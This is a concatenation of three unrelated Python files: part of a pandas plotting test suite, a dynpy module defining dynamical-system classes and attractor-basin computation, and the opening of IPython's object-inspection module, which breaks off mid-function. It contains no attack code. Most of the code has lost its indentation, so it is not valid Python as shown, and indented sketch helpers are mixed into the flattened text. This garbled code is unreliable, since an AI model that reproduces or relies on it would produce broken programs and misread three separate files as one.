# GH9053 - ensure that a plot with PeriodConverter still understands
# datetime64 data. This still fails because matplotlib overrides the
# ax.xaxis.converter with a DatetimeConverter
s = Series(np.random.randn(10), index=date_range("1970-01-02", periods=10))
ax = s.plot()
with tm.assert_produces_warning(DeprecationWarning):
# multi-dimensional indexing
ax.plot(s.index, s.values, color="g")
l1, l2 = ax.lines
tm.assert_numpy_array_equal(l1.get_xydata(), l2.get_xydata())
def test_matplotlib_scatter_datetime64(self):
# https://github.com/matplotlib/matplotlib/issues/11391
df = DataFrame(np.random.RandomState(0).rand(10, 2), columns=["x", "y"])
df["time"] = date_range("2018-01-01", periods=10, freq="D")
fig, ax = self.plt.subplots()
ax.scatter(x="time", y="y", data=df)
self.plt.draw()
label = ax.get_xticklabels()[0]
if self.mpl_ge_3_2_0:
expected = "2018-01-01"
elif self.mpl_ge_3_0_0:
expected = "2017-12-08"
else:
expected = "2017-12-12"
assert label.get_text() == expected
def test_check_xticks_rot(self):
# https://github.com/pandas-dev/pandas/issues/29460
# regular time series
x = to_datetime(["2020-05-01", "2020-05-02", "2020-05-03"])
df = DataFrame({"x": x, "y": [1, 2, 3]})
axes = df.plot(x="x", y="y")
self._check_ticks_props(axes, xrot=0)
# irregular time series
x = to_datetime(["2020-05-01", "2020-05-02", "2020-05-04"])
df = DataFrame({"x": x, "y": [1, 2, 3]})
axes = df.plot(x="x", y="y")
self._check_ticks_props(axes, xrot=30)
# use timeseries index or not
axes = df.set_index("x").plot(y="y", use_index=True)
self._check_ticks_props(axes, xrot=30)
axes = df.set_index("x").plot(y="y", use_index=False)
self._check_ticks_props(axes, xrot=0)
# separate subplots
axes = df.plot(x="x", y="y", subplots=True, sharex=True)
self._check_ticks_props(axes, xrot=30)
axes = df.plot(x="x", y="y", subplots=True, sharex=False)
self._check_ticks_props(axes, xrot=0)
def _check_plot_works(f, freq=None, series=None, *args, **kwargs):
    """Call plotting function ``f`` twice (once on a fresh subplot), check the axes
    frequency when one is expected, and verify the figure can be saved and pickled.
    """
import matplotlib.pyplot as plt
fig = plt.gcf()
try:
plt.clf()
ax = fig.add_subplot(211)
orig_ax = kwargs.pop("ax", plt.gca())
orig_axfreq = getattr(orig_ax, "freq", None)
ret = f(*args, **kwargs)
assert ret is not None # do something more intelligent
ax = kwargs.pop("ax", plt.gca())
if series is not None:
dfreq = series.index.freq
if isinstance(dfreq, BaseOffset):
dfreq = dfreq.rule_code
if orig_axfreq is None:
assert ax.freq == dfreq
if freq is not None and orig_axfreq is None:
assert ax.freq == freq
ax = fig.add_subplot(212)
kwargs["ax"] = ax
ret = f(*args, **kwargs)
assert ret is not None # TODO: do something more intelligent
with tm.ensure_clean(return_filelike=True) as path:
plt.savefig(path)
# GH18439, GH#24088, statsmodels#4772
with tm.ensure_clean(return_filelike=True) as path:
pickle.dump(fig, path)
finally:
plt.close(fig)
|
|
"""Module implementing some base classes useful for implementing dynamical
systems"""
from __future__ import division, print_function, absolute_import
import six
range = six.moves.range
map = six.moves.map
import numpy as np
from . import mx
from . import caching
from .mx import hashable_state
from .utils import readonlydict
# Constants for finding attractors
MAX_ATTRACTOR_LENGTH = 5
TRANSIENT_LENGTH = 30
class DynamicalSystem(object):
"""Base class for dynamical systems.
Parameters
----------
discrete_time : bool, optional
Whether updating should be done using discrete (default) or continuous
time dynamics.
"""
#: Whether the dynamical system obeys discrete- or continuous-time dynamics
discrete_time = True
def __init__(self, discrete_time=True):
self.discrete_time = discrete_time
if self.discrete_time:
self.iterate = self._iterate_discrete
self.iterate_1step = self._iterate_1step_discrete
else:
self.iterate = self._iterate_continuous
def iterate(self, start_state, max_time):
"""This method runs the dynamical system for `max_time` starting from
`start_state` and returns the result. In fact, this method is set at
run-time by the constructor to either `_iterateDiscrete` or
`_iterateContinuous` depending on whether the dynamical system object
is initialized with `discrete_time=True` or `discrete_time=False`. Thus,
sub-classes should override `_iterateDiscrete` and `_iterateContinuous`
instead of this method. See also
:meth:`dynpy.dynsys.DynamicalSystem.iterateOneStep`
Parameters
----------
start_state : numpy array or scipy.sparse matrix
Which state to start from
max_time : float
Until which point to run the dynamical system (number of iterations
for discrete-time systems or time limit for continuous-time systems)
Returns
-------
numpy array or scipy.sparse matrix
End state
"""
raise NotImplementedError
def iterate_1step(self, start_state):
"""
        This method runs a discrete-time dynamical system for one timestep. At
        run-time, the constructor rebinds it to `_iterate_1step_discrete` for
        discrete-time systems; for continuous-time systems it is left
        unimplemented.
Parameters
----------
start_state : numpy array or scipy.sparse matrix
Which state to start from
Returns
-------
numpy array or scipy.sparse matrix
Iterated state
"""
raise NotImplementedError
def _iterate_1step_discrete(self, start_state):
raise NotImplementedError
def _iterate_continuous(self, start_state, max_time=1.0):
raise NotImplementedError
def _iterate_discrete(self, start_state, max_time=1.0):
if max_time == 1.0:
return self.iterate_1step(start_state)
elif max_time == 0.0:
return start_state
else:
cur_state = start_state
for i in range(int(max_time)):
cur_state = self.iterate_1step(cur_state)
return cur_state
def get_trajectory(self, start_state, max_time, num_points=None,
logscale=False):
"""This method get a trajectory of a dynamical system starting from
a particular starting state.
Parameters
----------
start_state : object
Which state to start from
max_time : float
Until which point to run the dynamical system (number of iterations
for discrete-time systems or time limit for continuous-time systems)
num_points : int, optional
How many timepoints to sample the trajectory at. This determines
how big each 'step size' is. By default, equal to ``int(max_time)``
logscale : bool, optional
Whether to sample the timepoints on a logscale or not (default)
Returns
-------
trajectory: numpy array
Array of states corresponding to trajectory
"""
# TODO: would this accumulate error for continuous case?
if num_points is None:
num_points = int(max_time)
if logscale:
timepoints = np.logspace(0, np.log10(max_time), num=num_points,
endpoint=True, base=10.0)
else:
timepoints = np.linspace(0, max_time, num=num_points, endpoint=True)
cur_state = start_state
trajectory = [cur_state,]
start_state_cls = mx.get_state_cls(start_state)
for t in range(1, len(timepoints)):
run_time = timepoints[t]-timepoints[t-1]
next_state = self.iterate(cur_state, max_time=run_time)
cur_state = start_state_cls.format_obj(next_state)
trajectory.append( cur_state )
return start_state_cls.vstack(trajectory)
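# Illustrative sketch (not part of the library): a minimal discrete-time subclass
# only needs to provide `_iterate_1step_discrete`; the constructor then wires up
# `iterate` (and hence `get_trajectory`) as documented above. The class name below
# is hypothetical.
class _ExampleDoublingMap(DynamicalSystem):
    """Toy map x_{t+1} = 2 * x_t mod 1 on the unit interval."""
    def _iterate_1step_discrete(self, start_state):
        return (2.0 * start_state) % 1.0
# _ExampleDoublingMap().iterate(0.3, max_time=3) steps 0.3 -> 0.6 -> 0.2 -> 0.4
# (up to floating-point rounding).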
class DeterministicDynamicalSystem(DynamicalSystem):
    """Marker base class for deterministic dynamical systems."""
    pass
class StochasticDynamicalSystem(DynamicalSystem):
    """Marker base class for stochastic dynamical systems."""
    pass
class DiscreteStateDynamicalSystem(DynamicalSystem):
    def states(self):
        """Return an iterable over all states of the system (must be overridden)."""
        raise NotImplementedError
def get_attractor_basins(self, sort=False, start_state_iter=None):
"""Computes the attractors and basins of the current discrete-state
dynamical system.
Parameters
----------
sort : bool, optional
Whether to sort attractors and basin states (slower).
start_state_iter : iterator, optional
Iterator to indicate which start-states to start from. If not
specified, tries all states.
Returns
-------
basin_atts : list of lists
            A list of the attractor states for each basin (basin order is
from largest basin to smallest).
basin_states : list of lists
A list of all the states in each basin (basin order is from largest
basin to smallest).
"""
state_basins = {}
attractors = {}
iteratefunc = self.iterate
if start_state_iter is None:
start_state_iter = self.states()
for raw_startstate in start_state_iter:
startstate = hashable_state(raw_startstate)
if startstate in state_basins:
continue
traj = set()
cstate = startstate
while True:
traj.add(cstate)
cstate = hashable_state(iteratefunc(cstate))
if cstate in traj: # cycle closed
cur_cycle = []
cyclestate = cstate
while True:
cur_cycle.append(cyclestate)
cyclestate = hashable_state(iteratefunc(cyclestate))
if cyclestate == cstate:
break
cur_cycle = tuple(sorted(cur_cycle))
if cur_cycle not in attractors:
cndx = len(attractors)
attractors[cur_cycle] = cndx
state_basins[cstate] = attractors[cur_cycle]
if cstate in state_basins:
for s in traj:
state_basins[s] = state_basins[cstate]
break
basins = [ [] for _ in range(len(attractors))]
for state, basin in six.iteritems(state_basins):
basins[basin].append(state)
keyfunc = lambda k: (-len(basins[attractors[k]]),k)
attractor_states = attractors.keys()
if sort:
attractor_states = sorted(attractor_states, key=keyfunc)
basins_states = []
for att in attractor_states:
cbasin = basins[attractors[att]]
if sort:
cbasin = sorted(cbasin)
basins_states.append(cbasin)
return attractor_states, basins_states
def print_attractor_basins(self):
"""Prints the attractors and basin of the dynamical system
>>> import dynpy
>>> rules = [ ['a',['a','b'],[1,1,1,0]],['b',['a','b'],[1,0,0,0]]]
>>> bn = dynpy.bn.BooleanNetwork(rules=rules)
>>> bn.print_attractor_basins()
* BASIN 1 : 2 States
ATTRACTORS:
a b
1 0
--------------------------------------------------------------------------------
* BASIN 2 : 1 States
ATTRACTORS:
a b
0 0
--------------------------------------------------------------------------------
* BASIN 3 : 1 States
ATTRACTORS:
a b
1 1
--------------------------------------------------------------------------------
"""
basin_atts, basin_states = self.get_attractor_basins(sort=True)
for cur_basin_ndx in range(len(basin_atts)):
print("* BASIN %d : %d States" %
(cur_basin_ndx+1, len(basin_states[cur_basin_ndx])))
print("ATTRACTORS:")
print(self._get_state_row_title())
for att in basin_atts[cur_basin_ndx]:
print(self._get_state_row_repr(att))
print("".join(['-', ] * 80))
def _get_state_row_repr(self, state):
return state
def _get_state_row_title(self):
return 'State'
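# Worked example (illustrative, not executed here): for a toy four-state map where
# states 0 and 1 both lead to the fixed point 0 while states 2 and 3 swap with each
# other, get_attractor_basins(sort=True) would report two basins: attractor (0,)
# with basin states [0, 1], and attractor (2, 3) with basin states [2, 3].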
class VectorDynamicalSystem(DynamicalSystem):
"""Mix-in for classes implementing dynamics over multivariate systems.
Parameters
----------
num_vars : int, optional
How many variables (i.e., how many 'dimensions' or 'nodes' are in the
dynamical system). Default is 1
var_names : list, optional
Names for the variables (optional). Default is simply the numeric
indexes of the variables.
discrete_time : bool, optional
Whether dynamical system is discrete or continuous time.
"""
#: The number of variables in the dynamical system
num_vars = None
def __init__(self, num_vars, var_names=None, discrete_time=True):
super(VectorDynamicalSystem,self).__init__(discrete_time)
self.num_vars = num_vars
self.var_names = tuple(var_names if var_names is not None
else range(self.num_vars))
"""The names of the variables in the dynamical system"""
    # Make this a cached property so it's not necessarily run every time a
# dynamical systems object is created, whether we need it or not
@caching.cached_data_prop
def var_name_ndxs(self):
"""A mapping from variables names to their indexes
"""
return dict((l, ndx) for ndx, l in enumerate(self.var_names))
def _get_state_row_repr(self, state):
row_format = "{:>7}" * self.num_vars
return row_format.format(*state)
def _get_state_row_title(self):
row_format = "{:>7}" * self.num_vars
return row_format.format(*self.var_names)
class DiscreteStateVectorDynamicalSystem(VectorDynamicalSystem,
DiscreteStateDynamicalSystem):
@caching.cached_data_method
def get_ndx2state_mx(self):
#: ``(num_states, num_vars)``-shaped matrix that maps from state indexes
#: to representations in terms of activations of the variables.
return np.vstack(self.states())
@caching.cached_data_method
def get_ndx2state_map(self):
return readonlydict( enumerate(self.states()) )
@caching.cached_data_method
def get_state2ndx_map(self):
return readonlydict(
{ hashable_state(v):k
for k, v in six.iteritems(self.get_ndx2state_map()) })
class ProjectedStateSpace(DiscreteStateVectorDynamicalSystem):
# TODO: Document
def __init__(self, keep_vars, base_sys, *kargs, **kwargs):
self.keep_vars = keep_vars
self.base_sys = base_sys
var_names = None
if base_sys.var_names is not None:
var_names = [base_sys.var_names[i] for i in keep_vars]
super(ProjectedStateSpace, self).__init__(
num_vars=len(keep_vars),
var_names=var_names,
*kargs, **kwargs)
def states(self):
done = set()
n2smx = self.base_sys.get_ndx2state_mx()
for c in map(hashable_state, n2smx[:,self.keep_vars]):
if c not in done:
done.add(c)
yield c
class LinearDynamicalSystem(VectorDynamicalSystem):
# TODO: TESTS
"""This class implements linear dynamical systems, whether continuous or
discrete-time. It is also used by :class:`dynpy.dynsys.MarkovChain` to
implement Markov Chain (discrete-case) or master equation (continuous-case)
dynamics.
For attribute definitions, see documentation of
:class:`dynpy.dynsys.DynamicalSystem`.
Parameters
----------
transition_matrix : numpy array or scipy.sparse matrix
Matrix defining the evolution of the dynamical system, i.e. the
:math:`\\mathbf{A}` in
:math:`\\mathbf{x_{t+1}} = \\mathbf{x_{t}}\\mathbf{A}` (in the
discrete-time case) or
:math:`\\dot{\\mathbf{x}} = \\mathbf{x}\\mathbf{A}` (in the
continuous-time case)
discrete_time : bool, optional
Whether updating should be done using discrete (default) or continuous
time dynamics.
"""
#: Transition matrix for linear system.
transition_matrix = None
def __init__(self, transition_matrix, discrete_time=True):
super(LinearDynamicalSystem, self).__init__(
num_vars=transition_matrix.shape[0],
discrete_time=discrete_time)
self.transition_matrix = transition_matrix
self.stable_eigenvalue = 1.0 if discrete_time else 0.0
def get_equilibrium_distribution(self):
"""Get equilibrium state of dynamical system using eigen-decomposition
Returns
-------
numpy array or scipy.sparse matrix
Equilibrium state
"""
vals, vecs = mx.get_largest_left_eigs(self.transition_matrix)
equil_evals = np.flatnonzero(np.abs(vals-self.stable_eigenvalue) < 1e-8)
if len(equil_evals) != 1:
raise Exception("Expected one stable eigenvalue, but found " +
"%d instead (%s)" % (len(equil_evals), equil_evals))
dist = np.real_if_close(np.ravel(vecs[equil_evals, :]))
        if np.any(np.iscomplex(dist)):
            raise Exception("Expected equilibrium state to be real! %s" %
                            dist)
return mx.format_mx(dist)
def _iterate_1step_discrete(self, start_state):
# For discrete time systems, one step
r = mx.format_mx(start_state).dot(self.transition_matrix)
return r
def _iterate_discrete(self, start_state, max_time=1.0):
# For discrete time systems
if max_time == 0.0:
return start_state
cls = mx.get_matrix_cls(self.transition_matrix)
r = cls.format_mx(start_state).dot(
cls.pow(self.transition_matrix, int(max_time)))
return r
def _iterate_continuous(self, start_state, max_time=1.0):
if max_time == 0.0:
return start_state
cls = mx.get_matrix_cls(self.transition_matrix)
curStartStates = cls.format_mx(start_state)
r = curStartStates.dot(
cls.expm(max_time * (self.transition_matrix)))
return r
# TODO
# def getMultistepDynsys(self, num_iters):
# import copy
# rObj = copy.copy(self)
# rObj.trans = self.transition_matrixCls.pow(self.transition_matrix, num_iters)
# return rObj
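# Illustrative sketch (not part of the original module), assuming only numpy:
# computing the equilibrium distribution of a small discrete-time Markov chain
# directly, mirroring the left-eigenvector decomposition used by
# LinearDynamicalSystem.get_equilibrium_distribution above.
def _example_equilibrium_sketch():
    import numpy as np
    # Row-stochastic transition matrix for a 2-state chain; states evolve as
    # x_{t+1} = x_t A, so the stationary distribution is a left eigenvector
    # of A with eigenvalue 1.0.
    A = np.array([[0.9, 0.1],
                  [0.5, 0.5]])
    vals, vecs = np.linalg.eig(A.T)          # left eigs of A = right eigs of A.T
    stable = np.argmin(np.abs(vals - 1.0))   # index of the stable eigenvalue
    dist = np.real_if_close(vecs[:, stable])
    dist = dist / dist.sum()                 # normalize to a probability vector
    return dist                              # approximately [0.8333, 0.1667]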
|
|
# -*- coding: utf-8 -*-
"""Tools for inspecting Python objects.
Uses syntax highlighting for presenting the various information elements.
Similar in spirit to the inspect module, but all calls take a name argument to
reference the name under which an object is being read.
"""
#*****************************************************************************
# Copyright (C) 2001-2004 Fernando Perez <[email protected]>
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#*****************************************************************************
from __future__ import print_function
__all__ = ['Inspector','InspectColors']
# stdlib modules
import inspect
import linecache
import os
import types
import io as stdlib_io
try:
from itertools import izip_longest
except ImportError:
from itertools import zip_longest as izip_longest
# IPython's own
from IPython.core import page
from IPython.testing.skipdoctest import skip_doctest_py3
from IPython.utils import PyColorize
from IPython.utils import io
from IPython.utils import openpy
from IPython.utils import py3compat
from IPython.utils.text import indent
from IPython.utils.wildcard import list_namespace
from IPython.utils.coloransi import *
from IPython.utils.py3compat import cast_unicode
# builtin docstrings to ignore
_func_call_docstring = types.FunctionType.__call__.__doc__
_object_init_docstring = object.__init__.__doc__
_builtin_type_docstrings = set([
t.__doc__ for t in (types.ModuleType, types.MethodType, types.FunctionType)
])
#****************************************************************************
# Builtin color schemes
Colors = TermColors # just a shorthand
# Build a few color schemes
NoColor = ColorScheme(
'NoColor',{
'header' : Colors.NoColor,
'normal' : Colors.NoColor # color off (usu. Colors.Normal)
} )
LinuxColors = ColorScheme(
'Linux',{
'header' : Colors.LightRed,
'normal' : Colors.Normal # color off (usu. Colors.Normal)
} )
LightBGColors = ColorScheme(
'LightBG',{
'header' : Colors.Red,
'normal' : Colors.Normal # color off (usu. Colors.Normal)
} )
# Build table of color schemes (needed by the parser)
InspectColors = ColorSchemeTable([NoColor,LinuxColors,LightBGColors],
'Linux')
#****************************************************************************
# Auxiliary functions and objects
# See the messaging spec for the definition of all these fields. This list
# effectively defines the order of display
info_fields = ['type_name', 'base_class', 'string_form', 'namespace',
'length', 'file', 'definition', 'docstring', 'source',
'init_definition', 'class_docstring', 'init_docstring',
'call_def', 'call_docstring',
# These won't be printed but will be used to determine how to
# format the object
'ismagic', 'isalias', 'isclass', 'argspec', 'found', 'name'
]
def object_info(**kw):
"""Make an object info dict with all fields present."""
infodict = dict(izip_longest(info_fields, [None]))
infodict.update(kw)
return infodict
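# Illustrative sketch (not part of the original module): object_info()
# guarantees that every key listed in info_fields is present, defaulting to
# None, so the display code below can index the dict unconditionally.
def _example_object_info():
    info = object_info(name='x', found=True, type_name='int')
    assert info['docstring'] is None     # unspecified fields default to None
    assert info['type_name'] == 'int'    # supplied fields are kept as-is
    return info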
def get_encoding(obj):
"""Get encoding for python source file defining obj
Returns None if obj is not defined in a sourcefile.
"""
ofile = find_file(obj)
    # Only attempt to detect an encoding for text source files that exist on
    # disk; binary extension modules and missing files are skipped below.
if ofile is None:
return None
elif ofile.endswith(('.so', '.dll', '.pyd')):
return None
elif not os.path.isfile(ofile):
return None
else:
        # Read the raw bytes and let openpy detect the declared source
        # encoding (PEP 263 coding cookie or BOM).
buffer = stdlib_io.open(ofile, 'rb') # Tweaked to use io.open for Python 2
encoding, lines = openpy.detect_encoding(buffer.readline)
return encoding
def getdoc(obj):
"""Stable wrapper around inspect.getdoc.
This can't crash because of attribute problems.
It also attempts to call a getdoc() method on the given object. This
allows objects which provide their docstrings via non-standard mechanisms
(like Pyro proxies) to still be inspected by ipython's ? system."""
# Allow objects to offer customized documentation via a getdoc method:
try:
ds = obj.getdoc()
except Exception:
pass
else:
# if we get extra info, we add it to the normal docstring.
if isinstance(ds, basestring):
return inspect.cleandoc(ds)
try:
docstr = inspect.getdoc(obj)
encoding = get_encoding(obj)
return py3compat.cast_unicode(docstr, encoding=encoding)
    except Exception:
        # Harden against an inspect failure, which can occur with
        # SWIG-wrapped extensions.
        return None
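# Illustrative sketch (not part of the original module), following the
# module's Python-2-era conventions: an object can supply its own
# documentation through a getdoc() method (as Pyro proxies do), and the
# getdoc() wrapper above prefers that over the ordinary class docstring.
def _example_custom_getdoc():
    class Proxy(object):
        """Ordinary docstring that would normally be returned."""
        def getdoc(self):
            return "Documentation fetched from a remote object."
    return getdoc(Proxy())   # -> "Documentation fetched from a remote object."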
def getsource(obj,is_binary=False):
"""Wrapper around inspect.getsource.
This can be modified by other projects to provide customized source
extraction.
Inputs:
- obj: an object whose source code we will attempt to extract.
Optional inputs:
- is_binary: whether the object is known to come from a binary source.
This implementation will skip returning any output for binary objects, but
custom extractors may know how to meaningfully process them."""
if is_binary:
return None
else:
# get source if obj was decorated with @decorator
if hasattr(obj,"__wrapped__"):
obj = obj.__wrapped__
try:
src = inspect.getsource(obj)
except TypeError:
if hasattr(obj,'__class__'):
src = inspect.getsource(obj.__class__)
encoding = get_encoding(obj)
return cast_unicode(src, encoding=encoding)
def getargspec(obj):
"""Get the names and default values of a function's arguments.
A tuple of four things is returned: (args, varargs, varkw, defaults).
'args' is a list of the argument names (it may contain nested lists).
'varargs' and 'varkw' are the names of the * and ** arguments or None.
'defaults' is an n-tuple of the default values of the last n arguments.
Modified version of inspect.getargspec from the Python Standard
Library."""
if inspect.isfunction(obj):
func_obj = obj
elif inspect.ismethod(obj):
func_obj = obj.im_func
elif hasattr(obj, '__call__'):
func_obj = obj.__call__
else:
raise TypeError('arg is not a Python function')
args, varargs, varkw = inspect.getargs(func_obj.func_code)
return args, varargs, varkw, func_obj.func_defaults
def format_argspec(argspec):
"""Format argspect, convenience wrapper around inspect's.
This takes a dict instead of ordered arguments and calls
inspect.format_argspec with the arguments in the necessary order.
"""
return inspect.formatargspec(argspec['args'], argspec['varargs'],
argspec['varkw'], argspec['defaults'])
def call_tip(oinfo, format_call=True):
"""Extract call tip data from an oinfo dict.
Parameters
----------
oinfo : dict
format_call : bool, optional
If True, the call line is formatted and returned as a string. If not, a
tuple of (name, argspec) is returned.
Returns
-------
call_info : None, str or (str, dict) tuple.
      When format_call is True, the whole call information is formatted as a
single string. Otherwise, the object's name and its argspec dict are
returned. If no call information is available, None is returned.
docstring : str or None
The most relevant docstring for calling purposes is returned, if
available. The priority is: call docstring for callable instances, then
constructor docstring for classes, then main object's docstring otherwise
(regular functions).
"""
# Get call definition
argspec = oinfo.get('argspec')
if argspec is None:
call_line = None
else:
# Callable objects will have 'self' as their first argument, prune
# it out if it's there for clarity (since users do *not* pass an
# extra first argument explicitly).
try:
has_self = argspec['args'][0] == 'self'
except (KeyError, IndexError):
pass
else:
if has_self:
argspec['args'] = argspec['args'][1:]
call_line = oinfo['name']+format_argspec(argspec)
# Now get docstring.
# The priority is: call docstring, constructor docstring, main one.
doc = oinfo.get('call_docstring')
if doc is None:
doc = oinfo.get('init_docstring')
if doc is None:
doc = oinfo.get('docstring','')
return call_line, doc
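# Illustrative sketch (not part of the original module): with no argspec
# available no call line is built, and the docstring returned by call_tip
# follows the priority call docstring -> constructor docstring -> main
# docstring described above.
def _example_call_tip_priority():
    oinfo = object_info(name='f', docstring='main doc',
                        init_docstring='constructor doc')
    call_line, doc = call_tip(oinfo)
    assert call_line is None          # argspec defaults to None, so no call line
    assert doc == 'constructor doc'   # outranks the plain docstring
    return call_line, doc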
def safe_hasattr(obj, attr):
"""In recent versions of Python, hasattr() only catches AttributeError.
This catches all errors.
"""
try:
getattr(obj, attr)
return True
except:
return False
def find_file(obj):
"""Find the absolute path to the file where an object was defined.
This is essentially a robust wrapper around `inspect.getabsfile`.
Returns None if no file can be found.
Parameters
----------
obj : any Python object
Returns
-------
fname : str
The absolute path to the file where the object was defined.
"""
# get source if obj was decorated with @decorator
if safe_hasattr(obj, '__wrapped__'):
obj = obj.__wrapped__
fname = None
try:
fname = inspect.getabsfile(obj)
except TypeError:
# For an instance, the file that matters is where its class was
# declared.
if hasattr(obj, '__class__'):
try:
fname = inspect.getabsfile(obj.__class__)
except TypeError:
# Can happen for builtins
pass
except:
pass
return cast_unicode(fname)
def find_source_lines(obj):
"""Find the line number in a file where an object was defined.
This is essentially a robust wrapper around `inspect.getsourcelines`.
Returns None if no file can be found.
Parameters
----------
obj : any Python object
Returns
-------
lineno : int
The line number where the object definition starts.
"""
# get source if obj was decorated with @decorator
if safe_hasattr(obj, '__wrapped__'):
obj = obj.__wrapped__
try:
try:
lineno = inspect.getsourcelines(obj)[1]
except TypeError:
# For instances, try the class object like getsource() does
if hasattr(obj, '__class__'):
lineno = inspect.getsourcelines(obj.__class__)[1]
else:
lineno = None
except:
return None
return lineno
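# Illustrative sketch (not part of the original module): find_source_lines()
# follows a decorator's __wrapped__ attribute back to the original function
# before asking inspect for the line number.
def _example_find_source_lines_wrapped():
    def original():
        pass
    def wrapper():
        pass
    wrapper.__wrapped__ = original
    return find_source_lines(wrapper) == find_source_lines(original)   # True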
class Inspector:
def __init__(self, color_table=InspectColors,
code_color_table=PyColorize.ANSICodeColors,
scheme='NoColor',
str_detail_level=0):
self.color_table = color_table
self.parser = PyColorize.Parser(code_color_table,out='str')
self.format = self.parser.format
self.str_detail_level = str_detail_level
self.set_active_scheme(scheme)
def _getdef(self,obj,oname=''):
"""Return the call signature for any callable object.
If any exception is generated, None is returned instead and the
exception is suppressed."""
try:
hdef = oname + inspect.formatargspec(*getargspec(obj))
return cast_unicode(hdef)
except:
return None
def __head(self,h):
"""Return a header string with proper colors."""
return '%s%s%s' % (self.color_table.active_colors.header,h,
self.color_table.active_colors.normal)
def set_active_scheme(self, scheme):
self.color_table.set_active_scheme(scheme)
self.parser.color_table.set_active_scheme(scheme)
def noinfo(self, msg, oname):
"""Generic message when no information is found."""
print('No %s found' % msg, end=' ')
if oname:
print('for %s' % oname)
else:
print()
def pdef(self, obj, oname=''):
"""Print the call signature for any callable object.
If the object is a class, print the constructor information."""
if not callable(obj):
print('Object is not callable.')
return
header = ''
if inspect.isclass(obj):
header = self.__head('Class constructor information:\n')
obj = obj.__init__
elif (not py3compat.PY3) and type(obj) is types.InstanceType:
obj = obj.__call__
output = self._getdef(obj,oname)
if output is None:
self.noinfo('definition header',oname)
else:
print(header,self.format(output), end=' ', file=io.stdout)
# In Python 3, all classes are new-style, so they all have __init__.
@skip_doctest_py3
def pdoc(self,obj,oname='',formatter = None):
"""Print the docstring for any object.
Optional:
-formatter: a function to run the docstring through for specially
formatted docstrings.
Examples
--------
In [1]: class NoInit:
...: pass
In [2]: class NoDoc:
...: def __init__(self):
...: pass
In [3]: %pdoc NoDoc
No documentation found for NoDoc
In [4]: %pdoc NoInit
No documentation found for NoInit
In [5]: obj = NoInit()
In [6]: %pdoc obj
No documentation found for obj
In [5]: obj2 = NoDoc()
In [6]: %pdoc obj2
No documentation found for obj2
"""
head = self.__head # For convenience
lines = []
ds = getdoc(obj)
if formatter:
ds = formatter(ds)
if ds:
lines.append(head("Class Docstring:"))
lines.append(indent(ds))
if inspect.isclass(obj) and hasattr(obj, '__init__'):
init_ds = getdoc(obj.__init__)
if init_ds is not None:
lines.append(head("Constructor Docstring:"))
lines.append(indent(init_ds))
elif hasattr(obj,'__call__'):
call_ds = getdoc(obj.__call__)
if call_ds:
lines.append(head("Calling Docstring:"))
lines.append(indent(call_ds))
if not lines:
self.noinfo('documentation',oname)
else:
page.page('\n'.join(lines))
def psource(self,obj,oname=''):
"""Print the source code for an object."""
# Flush the source cache because inspect can return out-of-date source
linecache.checkcache()
try:
src = getsource(obj)
except:
self.noinfo('source',oname)
else:
page.page(self.format(src))
def pfile(self, obj, oname=''):
"""Show the whole file where an object was defined."""
lineno = find_source_lines(obj)
if lineno is None:
self.noinfo('file', oname)
return
ofile = find_file(obj)
# run contents of file through pager starting at line where the object
# is defined, as long as the file isn't binary and is actually on the
# filesystem.
if ofile.endswith(('.so', '.dll', '.pyd')):
print('File %r is binary, not printing.' % ofile)
elif not os.path.isfile(ofile):
print('File %r does not exist, not printing.' % ofile)
else:
# Print only text files, not extension binaries. Note that
# getsourcelines returns lineno with 1-offset and page() uses
# 0-offset, so we must adjust.
page.page(self.format(openpy.read_py_file(ofile, skip_encoding_cookie=False)), lineno - 1)
def _format_fields(self, fields, title_width=12):
"""Formats a list of fields for display.
Parameters
----------
fields : list
A list of 2-tuples: (field_title, field_content)
title_width : int
How many characters to pad titles to. Default 12.
"""
out = []
header = self.__head
for title, content in fields:
if len(content.splitlines()) > 1:
title = header(title + ":") + "\n"
else:
title = header((title+":").ljust(title_width))
out.append(cast_unicode(title) + cast_unicode(content))
return "\n".join(out)
# The fields to be displayed by pinfo: (fancy_name, key_in_info_dict)
pinfo_fields1 = [("Type", "type_name"),
]
pinfo_fields2 = [("String Form", "string_form"),
]
pinfo_fields3 = [("Length", "length"),
("File", "file"),
("Definition", "definition"),
]
pinfo_fields_obj = [("Class Docstring", "class_docstring"),
("Constructor Docstring","init_docstring"),
("Call def", "call_def"),
("Call docstring", "call_docstring")]
def pinfo(self,obj,oname='',formatter=None,info=None,detail_level=0):
"""Show detailed information about an object.
Optional arguments:
- oname: name of the variable pointing to the object.
- formatter: special formatter for docstrings (see pdoc)
- info: a structure with some information fields which may have been
precomputed already.
- detail_level: if set to 1, more information is given.
"""
info = self.info(obj, oname=oname, formatter=formatter,
info=info, detail_level=detail_level)
displayfields = []
def add_fields(fields):
for title, key in fields:
field = info[key]
if field is not None:
displayfields.append((title, field.rstrip()))
add_fields(self.pinfo_fields1)
# Base class for old-style instances
if (not py3compat.PY3) and isinstance(obj, types.InstanceType) and info['base_class']:
displayfields.append(("Base Class", info['base_class'].rstrip()))
add_fields(self.pinfo_fields2)
# Namespace
if info['namespace'] != 'Interactive':
displayfields.append(("Namespace", info['namespace'].rstrip()))
add_fields(self.pinfo_fields3)
# Source or docstring, depending on detail level and whether
# source found.
if detail_level > 0 and info['source'] is not None:
displayfields.append(("Source",
self.format(cast_unicode(info['source']))))
elif info['docstring'] is not None:
displayfields.append(("Docstring", info["docstring"]))
# Constructor info for classes
if info['isclass']:
if info['init_definition'] or info['init_docstring']:
displayfields.append(("Constructor information", ""))
if info['init_definition'] is not None:
displayfields.append((" Definition",
info['init_definition'].rstrip()))
if info['init_docstring'] is not None:
displayfields.append((" Docstring",
indent(info['init_docstring'])))
# Info for objects:
else:
add_fields(self.pinfo_fields_obj)
# Finally send to printer/pager:
if displayfields:
page.page(self._format_fields(displayfields))
def info(self, obj, oname='', formatter=None, info=None, detail_level=0):
"""Compute a dict with detailed information about an object.
Optional arguments:
- oname: name of the variable pointing to the object.
- formatter: special formatter for docstrings (see pdoc)
- info: a structure with some information fields which may have been
precomputed already.
- detail_level: if set to 1, more information is given.
"""
obj_type = type(obj)
header = self.__head
if info is None:
ismagic = 0
isalias = 0
ospace = ''
else:
ismagic = info.ismagic
isalias = info.isalias
ospace = info.namespace
# Get docstring, special-casing aliases:
if isalias:
if not callable(obj):
try:
ds = "Alias to the system command:\n %s" % obj[1]
except:
ds = "Alias: " + str(obj)
else:
ds = "Alias to " + str(obj)
if obj.__doc__:
